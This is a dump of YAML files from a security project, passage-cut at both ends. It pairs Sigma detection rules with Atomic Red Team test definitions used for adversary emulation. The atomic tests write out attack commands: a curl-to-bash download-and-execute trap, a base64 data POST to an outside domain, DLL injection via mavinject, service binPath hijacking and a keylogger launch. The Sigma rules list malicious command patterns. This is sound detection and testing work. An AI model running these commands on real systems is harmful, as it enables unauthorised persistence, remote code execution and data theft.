10 | author: Sean Metcalf (source), Florian Roth (rule)
11 | logsource:
12 | product: windows
13 | service: powershell
14 | definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277'
15 | detection:
16 | selection:
17 | EventID: 4103
18 | keyword:
19 | - 'PS ATTACK!!!'
20 | condition: all of them
21 | falsepositives:
22 | - Pentesters
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1031.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1031
3 | display_name: Modify Existing Service
4 |
5 | atomic_tests:
6 | - name: Modify Fax service to run PowerShell
7 | description: |
8 | This test will temporarily modify the service Fax by changing the binPath to PowerShell
9 | and will then revert the binPath change, restoring Fax to its original state.
10 |
11 | supported_platforms:
12 | - windows
13 |
14 | executor:
15 | name: command_prompt
16 | elevation_required: true
17 | command: |
18 | sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\""
19 | sc start Fax
20 | cleanup_command:
21 | sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
22 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1154.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1154
3 | display_name: Trap
4 |
5 | atomic_tests:
6 | - name: Trap
7 | description: |
8 | After exiting the shell, the script will download and execute.
9 |
10 | After sending a keyboard interrupt (CTRL+C) the script will download and execute.
11 |
12 | supported_platforms:
13 | - macos
14 | - centos
15 | - ubuntu
16 | - linux
17 |
18 | executor:
19 | name: sh
20 | command: |
21 | trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
22 | exit
23 | trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_wmi_persistence_script_event_consumer_write.yml:
--------------------------------------------------------------------------------
1 | title: WMI Persistence - Script Event Consumer File Write
2 | id: 33f41cdd-35ac-4ba8-814b-c6a4244a1ad4
3 | status: experimental
4 | description: Detects file writes of WMI script event consumer
5 | references:
6 | - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
7 | author: Thomas Patzke
8 | date: 2018/03/07
9 | tags:
10 | - attack.t1084
11 | - attack.persistence
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 11
18 | Image: 'C:\WINDOWS\system32\wbem\scrcons.exe'
19 | condition: selection
20 | falsepositives:
21 | - Unknown (data set is too small; further testing needed)
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_wmi_backdoor_exchange_transport_agent.yml:
--------------------------------------------------------------------------------
1 | title: WMI Backdoor Exchange Transport Agent
2 | id: 797011dc-44f4-4e6f-9f10-a8ceefbe566b
3 | status: experimental
4 | description: Detects a WMi backdoor in Exchange Transport Agents via WMi event filters
5 | author: Florian Roth
6 | date: 2019/10/11
7 | references:
8 | - https://twitter.com/cglyer/status/1182389676876980224
9 | - https://twitter.com/cglyer/status/1182391019633029120
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | tags:
14 | - attack.persistence
15 | - attack.t1084
16 | detection:
17 | selection:
18 | ParentImage: '*\EdgeTransport.exe'
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: critical
23 |
24 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1179.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1179
3 | display_name: Hooking
4 |
5 | atomic_tests:
6 | - name: Hook PowerShell TLS Encrypt/Decrypt Messages
7 | description: |
8 | Hooks functions in PowerShell to read TLS Communications
9 | supported_platforms:
10 | - windows
11 | input_arguments:
12 | file_name:
13 | description: Dll To Inject
14 | type: Path
15 | default: C:\AtomicRedTeam\atomics\T1179\bin\T1179x64.dll
16 | server_name:
17 | description: TLS Server To Test Get Request
18 | type: Url
19 | default: https://www.example.com
20 | executor:
21 | name: powershell
22 | elevation_required: true
23 | command: |
24 | mavinject $pid /INJECTRUNNING #{file_name}
25 | curl #{server_name}
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_security_eventlog_cleared.yml:
--------------------------------------------------------------------------------
1 | title: Security Eventlog Cleared
2 | id: f2f01843-e7b8-4f95-a35a-d23584476423
3 | description: Some threat groups tend to delete the local 'Security' Eventlog using certain utitlities
4 | tags:
5 | - attack.defense_evasion
6 | - attack.t1070
7 | - car.2016-04-002
8 | author: Florian Roth
9 | logsource:
10 | product: windows
11 | service: security
12 | detection:
13 | selection:
14 | EventID:
15 | - 517
16 | - 1102
17 | condition: selection
18 | falsepositives:
19 | - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)
20 | - System provisioning (system reset before the golden image creation)
21 | level: high
22 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_wmi_persistence_script_event_consumer.yml:
--------------------------------------------------------------------------------
1 | title: WMI Persistence - Script Event Consumer
2 | id: ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e
3 | status: experimental
4 | description: Detects WMI script event consumers
5 | references:
6 | - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
7 | author: Thomas Patzke
8 | date: 2018/03/07
9 | tags:
10 | - attack.execution
11 | - attack.persistence
12 | - attack.t1047
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | Image: C:\WINDOWS\system32\wbem\scrcons.exe
19 | ParentImage: C:\Windows\System32\svchost.exe
20 | condition: selection
21 | falsepositives:
22 | - Legitimate event consumers
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_stonedrill.yml:
--------------------------------------------------------------------------------
1 | title: StoneDrill Service Install
2 | id: 9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6
3 | description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky
4 | author: Florian Roth
5 | references:
6 | - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/
7 | tags:
8 | - attack.persistence
9 | - attack.g0064
10 | - attack.t1050
11 | logsource:
12 | product: windows
13 | service: system
14 | detection:
15 | selection:
16 | EventID: 7045
17 | ServiceName: NtsSrv
18 | ServiceFileName: '* LocalService'
19 | condition: selection
20 | falsepositives:
21 | - Unlikely
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_powershell_b64_shellcode.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Base64 Encoded Shellcode
2 | id: 2d117e49-e626-4c7c-bd1f-c3c0147774c8
3 | description: Detects Base64 encoded Shellcode
4 | status: experimental
5 | references:
6 | - https://twitter.com/cyb3rops/status/1063072865992523776
7 | author: Florian Roth
8 | date: 2018/11/17
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1036
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection1:
17 | CommandLine: '*AAAAYInlM*'
18 | selection2:
19 | CommandLine:
20 | - '*OiCAAAAYInlM*'
21 | - '*OiJAAAAYInlM*'
22 | condition: selection1 and selection2
23 | falsepositives:
24 | - Unknown
25 | level: critical
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rare_service_installs.yml:
--------------------------------------------------------------------------------
1 | title: Rare Service Installs
2 | id: 66bfef30-22a5-4fcd-ad44-8d81e60922ae
3 | description: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious
4 | services
5 | status: experimental
6 | author: Florian Roth
7 | tags:
8 | - attack.persistence
9 | - attack.privilege_escalation
10 | - attack.t1050
11 | - car.2013-09-005
12 | logsource:
13 | product: windows
14 | service: system
15 | detection:
16 | selection:
17 | EventID: 7045
18 | timeframe: 7d
19 | condition: selection | count() by ServiceFileName < 5
20 | falsepositives:
21 | - Software installation
22 | - Software updates
23 | level: low
--------------------------------------------------------------------------------
/elemental/media/atomics/T1042.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1042
3 | display_name: Change Default File Association
4 |
5 | atomic_tests:
6 | - name: Change Default File Association
7 | description: |
8 | Change Default File Association From cmd.exe
9 |
10 | supported_platforms:
11 | - windows
12 | input_arguments:
13 | extension_to_change:
14 | description: File Extension To Hijack
15 | type: String
16 | default: .wav
17 | target_exenstion_handler:
18 | description: Thing To Open
19 | type: Path
20 | default: C:\Program Files\Windows Media Player\wmplayer.exe
21 | executor:
22 | name: command_prompt
23 | elevation_required: false
24 | command: |
25 | cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_hurricane_panda.yml:
--------------------------------------------------------------------------------
1 | title: Hurricane Panda Activity
2 | id: 0eb2107b-a596-422e-b123-b389d5594ed7
3 | author: Florian Roth
4 | status: experimental
5 | description: Detects Hurricane Panda Activity
6 | references:
7 | - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/
8 | tags:
9 | - attack.privilege_escalation
10 | - attack.g0009
11 | - attack.t1068
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine:
18 | - '* localgroup administrators admin /add'
19 | - '*\Win64.exe*'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: high
24 |
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_csc.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Parent of Csc.exe
2 | id: b730a276-6b63-41b8-bcf8-55930c8fc6ee
3 | description: Detects a suspicious parent of csc.exe, which could by a sign of payload delivery
4 | status: experimental
5 | references:
6 | - https://twitter.com/SBousseaden/status/1094924091256176641
7 | author: Florian Roth
8 | date: 2019/02/11
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1036
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | Image: '*\csc.exe*'
18 | ParentImage:
19 | - '*\wscript.exe'
20 | - '*\cscript.exe'
21 | - '*\mshta.exe'
22 | condition: selection
23 | falsepositives:
24 | - Unkown
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_vul_java_remote_debugging.yml:
--------------------------------------------------------------------------------
1 | title: Java Running with Remote Debugging
2 | id: 8f88e3f6-2a49-48f5-a5c4-2f7eedf78710
3 | description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect
4 | author: Florian Roth
5 | tags:
6 | - attack.discovery
7 | - attack.t1046
8 | logsource:
9 | category: process_creation
10 | product: windows
11 | detection:
12 | selection:
13 | CommandLine: '*transport=dt_socket,address=*'
14 | exclusion:
15 | - CommandLine: '*address=127.0.0.1*'
16 | - CommandLine: '*address=localhost*'
17 | condition: selection and not exclusion
18 | fields:
19 | - CommandLine
20 | - ParentCommandLine
21 | falsepositives:
22 | - unknown
23 | level: medium
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_win10_sched_task_0day.yml:
--------------------------------------------------------------------------------
1 | title: Windows 10 scheduled task SandboxEscaper 0-day
2 | id: 931b6802-d6a6-4267-9ffa-526f57f22aaf
3 | status: experimental
4 | description: Detects Task Scheduler .job import arbitrary DACL write\par
5 | references:
6 | - https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe
7 | author: Olaf Hartong
8 | date: 2019/05/22
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | Image: schtasks.exe
15 | CommandLine: '*/change*/TN*/RU*/RP*'
16 | condition: selection
17 | falsepositives:
18 | - Unknown
19 | tags:
20 | - attack.privilege_escalation
21 | - attack.execution
22 | - attack.t1053
23 | - car.2013-08-001
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1073.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1073
3 | display_name: DLL Side-Loading
4 |
5 | atomic_tests:
6 | - name: DLL Side-Loading using the Notepad++ GUP.exe binary
7 | description: |
8 | GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | process_name:
15 | description: Name of the created process
16 | type: string
17 | default: calculator.exe
18 |
19 | executor:
20 | name: command_prompt
21 | elevation_required: false
22 | command: |
23 | $PathToAtomicsFolder\T1073\bin\GUP.exe
24 | cleanup_command: |
25 | taskkill /F /IM #{process_name}
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_apt29_thinktanks.yml:
--------------------------------------------------------------------------------
1 | title: APT29
2 | id: 033fe7d6-66d1-4240-ac6b-28908009c71f
3 | description: This method detects a suspicious powershell command line combination as used by APT29 in a campaign against US think tanks
4 | references:
5 | - https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
6 | tags:
7 | - attack.execution
8 | - attack.g0016
9 | - attack.t1086
10 | author: Florian Roth
11 | date: 2018/12/04
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine: '*-noni -ep bypass $*'
18 | condition: selection
19 | falsepositives:
20 | - unknown
21 | level: critical
22 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_wmi_persistence_commandline_event_consumer.yml:
--------------------------------------------------------------------------------
1 | title: WMI Persistence - Command Line Event Consumer
2 | id: 05936ce2-ee05-4dae-9d03-9a391cf2d2c6
3 | status: experimental
4 | description: Detects WMI command line event consumers
5 | references:
6 | - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
7 | author: Thomas Patzke
8 | date: 2018/03/07
9 | tags:
10 | - attack.t1084
11 | - attack.persistence
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 7
18 | Image: 'C:\Windows\System32\wbem\WmiPrvSE.exe'
19 | ImageLoaded: 'wbemcons.dll'
20 | condition: selection
21 | falsepositives:
22 | - Unknown (data set is too small; further testing needed)
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_mavinject_proc_inj.yml:
--------------------------------------------------------------------------------
1 | title: MavInject Process Injection
2 | id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
3 | status: experimental
4 | description: Detects process injection using the signed Windows tool Mavinject32.exe
5 | references:
6 | - https://twitter.com/gN3mes1s/status/941315826107510784
7 | - https://reaqta.com/2017/12/mavinject-microsoft-injector/
8 | - https://twitter.com/Hexacorn/status/776122138063409152
9 | author: Florian Roth
10 | date: 2018/12/12
11 | tags:
12 | - attack.t1055
13 | - attack.t1218
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | CommandLine: '* /INJECTRUNNING *'
20 | condition: selection
21 | falsepositives:
22 | - unknown
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_netsh_port_fwd.yml:
--------------------------------------------------------------------------------
1 | title: Netsh Port Forwarding
2 | id: 322ed9ec-fcab-4f67-9a34-e7c6aef43614
3 | description: Detects netsh commands that configure a port forwarding
4 | references:
5 | - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
6 | date: 2019/01/29
7 | tags:
8 | - attack.lateral_movement
9 | - attack.command_and_control
10 | - attack.t1090
11 | status: experimental
12 | author: Florian Roth
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine:
19 | - netsh interface portproxy add v4tov4 *
20 | condition: selection
21 | falsepositives:
22 | - Legitimate administration
23 | level: medium
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_backup_delete.yml:
--------------------------------------------------------------------------------
1 | title: Backup Catalog Deleted
2 | id: 9703792d-fd9a-456d-a672-ff92efe4806a
3 | status: experimental
4 | description: Detects backup catalog deletions
5 | references:
6 | - https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx
7 | - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
8 | author: Florian Roth (rule), Tom U. @c_APT_ure (collection)
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1107
12 | logsource:
13 | product: windows
14 | service: application
15 | detection:
16 | selection:
17 | EventID: 524
18 | Source: Backup
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: medium
23 |
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_dsrm_password_change.yml:
--------------------------------------------------------------------------------
1 | title: Password Change on Directory Service Restore Mode (DSRM) Account
2 | id: 53ad8e36-f573-46bf-97e4-15ba5bf4bb51
3 | status: stable
4 | description: The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.
5 | references:
6 | - https://adsecurity.org/?p=1714
7 | author: Thomas Patzke
8 | tags:
9 | - attack.persistence
10 | - attack.privilege_escalation
11 | - attack.t1098
12 | logsource:
13 | product: windows
14 | service: security
15 | detection:
16 | selection:
17 | EventID: 4794
18 | condition: selection
19 | falsepositives:
20 | - Initial installation of a domain controller
21 | level: high
22 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1132.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1132
3 | display_name: Data Encoding
4 |
5 | atomic_tests:
6 | - name: Base64 Encoded data.
7 | description: |
8 | Utilizing a common technique for posting base64 encoded data.
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 |
14 | input_arguments:
15 | destination_url:
16 | description: Destination URL to post encoded data.
17 | type: string
18 | default: redcanary.com
19 | base64_data:
20 | description: Encoded data to post using fake Social Security number 111-11-1111.
21 | type: string
22 | default: MTExLTExLTExMTE=
23 |
24 | executor:
25 | name: sh
26 | command: |
27 | echo -n 111-11-1111 | base64
28 | curl -XPOST #{base64_data}.#{destination_url}
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_control_panel_item.yml:
--------------------------------------------------------------------------------
1 | title: Control Panel Items
2 | id: 0ba863e6-def5-4e50-9cea-4dd8c7dc46a4
3 | status: experimental
4 | description: Detects the use of a control panel item (.cpl) outside of the System32 folder
5 | reference:
6 | - https://attack.mitre.org/techniques/T1196/
7 | tags:
8 | - attack.execution
9 | - attack.t1196
10 | - attack.defense_evasion
11 | author: Kyaw Min Thein
12 | date: 2019/08/27
13 | level: critical
14 | logsource:
15 | product: windows
16 | category: process_creation
17 | detection:
18 | selection:
19 | CommandLine: '*.cpl'
20 | filter:
21 | CommandLine:
22 | - '*\System32\\*'
23 | - '*%System%*'
24 | condition: selection and not filter
25 | falsepositives:
26 | - Unknown
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_netsh_port_fwd_3389.yml:
--------------------------------------------------------------------------------
1 | title: Netsh RDP Port Forwarding
2 | id: 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63
3 | description: Detects netsh commands that configure a port forwarding of port 3389 used for RDP
4 | references:
5 | - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
6 | date: 2019/01/29
7 | tags:
8 | - attack.lateral_movement
9 | - attack.t1021
10 | - car.2013-07-002
11 | status: experimental
12 | author: Florian Roth
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine:
19 | - netsh i* p*=3389 c*
20 | condition: selection
21 | falsepositives:
22 | - Legitimate administration
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_uac_bypass_sdclt.yml:
--------------------------------------------------------------------------------
1 | title: UAC Bypass via sdclt
2 | id: 5b872a46-3b90-45c1-8419-f675db8053aa
3 | status: experimental
4 | description: Detects changes to HKCU:\Software\Classes\exefile\shell\runas\command\isolatedCommand
5 | references:
6 | - https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
7 | author: Omer Yampel
8 | logsource:
9 | product: windows
10 | service: sysmon
11 | detection:
12 | selection:
13 | EventID: 13
14 | TargetObject: 'HKEY_USERS\\*\Classes\exefile\shell\runas\command\isolatedCommand'
15 | condition: selection
16 | tags:
17 | - attack.defense_evasion
18 | - attack.privilege_escalation
19 | - attack.t1088
20 | - car.2019-04-001
21 | falsepositives:
22 | - unknown
23 | level: high
24 |
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_sdbinst_shim_persistence.yml:
--------------------------------------------------------------------------------
1 | title: Possible Shim Database Persistence via sdbinst.exe
2 | id: 517490a7-115a-48c6-8862-1a481504d5a8
3 | status: experimental
4 | description: Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.
5 | references:
6 | - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
7 | tags:
8 | - attack.persistence
9 | - attack.t1138
10 | author: Markus Neis
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | Image:
17 | - '*\sdbinst.exe'
18 | CommandLine:
19 | - '*.sdb*'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_taskmgr_parent.yml:
--------------------------------------------------------------------------------
1 | title: Taskmgr as Parent
2 | id: 3d7679bd-0c00-440c-97b0-3f204273e6c7
3 | status: experimental
4 | description: Detects the creation of a process from Windows task manager
5 | tags:
6 | - attack.defense_evasion
7 | - attack.t1036
8 | author: Florian Roth
9 | date: 2018/03/13
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | detection:
14 | selection:
15 | ParentImage: '*\taskmgr.exe'
16 | filter:
17 | Image:
18 | - '*\resmon.exe'
19 | - '*\mmc.exe'
20 | - '*\taskmgr.exe'
21 | condition: selection and not filter
22 | fields:
23 | - Image
24 | - CommandLine
25 | - ParentCommandLine
26 | falsepositives:
27 | - Administrative activity
28 | level: low
29 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1038.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1038
3 | display_name: DLL Search Order Hijacking
4 |
5 | atomic_tests:
6 | - name: DLL Search Order Hijacking - amsi.dll
7 | description: |
8 | Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version
9 | of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface)
10 | https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | executor:
16 | name: command_prompt
17 | elevation_required: false
18 | command: |
19 | copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
20 | copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
21 | cmd.exe /k %APPDATA%\updater.exe
22 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1056.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1056
3 | display_name: Input Capture
4 |
5 | atomic_tests:
6 | - name: Input Capture
7 | description: |
8 | Utilize PowerShell and external resource to capture keystrokes
9 | [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/src/Get-Keystrokes.ps1)
10 | Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | input_arguments:
16 | filepath:
17 | description: Name of the local file, include path.
18 | type: Path
19 | default: c:\key.log
20 |
21 | executor:
22 | name: powershell
23 | command: |
24 | $PathToAtomicsFolder\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_ntfs_ads_access.yml:
--------------------------------------------------------------------------------
1 | title: NTFS Alternate Data Stream
2 | id: 8c521530-5169-495d-a199-0a3a881ad24e
3 | status: experimental
4 | description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
5 | references:
6 | - http://www.powertheshell.com/ntfsstreams/
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1096
10 | author: Sami Ruohonen
11 | logsource:
12 | product: windows
13 | service: powershell
14 | definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277'
15 | detection:
16 | keyword1:
17 | - "set-content"
18 | keyword2:
19 | - "-stream"
20 | condition: keyword1 and keyword2
21 | falsepositives:
22 | - unknown
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_tropictrooper.yml:
--------------------------------------------------------------------------------
1 | title: TropicTrooper Campaign November 2018
2 | id: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79
3 | author: '@41thexplorer, Windows Defender ATP'
4 | status: stable
5 | description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
6 | references:
7 | - https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/
8 | tags:
9 | - attack.execution
10 | - attack.t1085
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | CommandLine: '*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc*'
17 | condition: selection
18 | level: high
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_eventlog_cleared.yml:
--------------------------------------------------------------------------------
1 | title: Eventlog Cleared
2 | id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982
3 | description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution
4 | references:
5 | - https://twitter.com/deviouspolack/status/832535435960209408
6 | - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
7 | author: Florian Roth
8 | tags:
9 | - attack.defense_evasion
10 | - attack.t1070
11 | - car.2016-04-002
12 | logsource:
13 | product: windows
14 | service: system
15 | detection:
16 | selection:
17 | EventID: 104
18 | Source: Microsoft-Windows-Eventlog
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: medium
23 |
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/net_susp_dns_txt_exec_strings.yml:
--------------------------------------------------------------------------------
1 | title: DNS TXT Answer with possible execution strings
2 | id: 8ae51330-899c-4641-8125-e39f2e07da72
3 | status: experimental
4 | description: Detects strings used in command execution in DNS TXT Answer
5 | references:
6 | - https://twitter.com/stvemillertime/status/1024707932447854592
7 | - https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1
8 | tags:
9 | - attack.t1071
10 | author: Markus Neis
11 | date: 2018/08/08
12 | logsource:
13 | category: dns
14 | detection:
15 | selection:
16 | record_type: 'TXT'
17 | answer:
18 | - '*IEX*'
19 | - '*Invoke-Expression*'
20 | - '*cmd.exe*'
21 | condition: selection
22 | falsepositives:
23 | - Unknown
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_apt_bluemashroom.yml:
--------------------------------------------------------------------------------
1 | title: BlueMashroom DLL Load
2 | id: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0
3 | status: experimental
4 | description: Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report
5 | references:
6 | - https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1117
10 | author: Florian Roth
11 | date: 2019/10/02
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine:
18 | - '*\regsvr32*\AppData\Local\\*'
19 | - '*\AppData\Local\\*,DllEntry*'
20 | condition: selection
21 | falsepositives:
22 | - Unlikely
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_sysvol_access.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious SYSVOL Domain Group Policy Access
2 | id: 05f3c945-dcc8-4393-9f3d-af65077a8f86
3 | status: experimental
4 | description: Detects Access to Domain Group Policies stored in SYSVOL
5 | references:
6 | - https://adsecurity.org/?p=2288
7 | - https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100
8 | author: Markus Neis
9 | date: 2018/04/09
10 | modified: 2018/12/11
11 | tags:
12 | - attack.credential_access
13 | - attack.t1003
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | CommandLine: '*\SYSVOL\\*\policies\\*'
20 | condition: selection
21 | falsepositives:
22 | - administrative activity
23 | level: medium
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_susp_powershell_rundll32.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Rundll32 Remote Thread Creation
2 | id: 99b97608-3e21-4bfe-8217-2a127c396a0e
3 | status: experimental
4 | description: Detects PowerShell remote thread creation in Rundll32.exe
5 | author: Florian Roth
6 | references:
7 | - https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html
8 | date: 2018/06/25
9 | logsource:
10 | product: windows
11 | service: sysmon
12 | detection:
13 | selection:
14 | EventID: 8
15 | SourceImage: '*\powershell.exe'
16 | TargetImage: '*\rundll32.exe'
17 | condition: selection
18 | tags:
19 | - attack.defense_evasion
20 | - attack.execution
21 | - attack.t1085
22 | - attack.t1086
23 | falsepositives:
24 | - Unkown
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_mal_ursnif.yml:
--------------------------------------------------------------------------------
1 | title: Ursnif
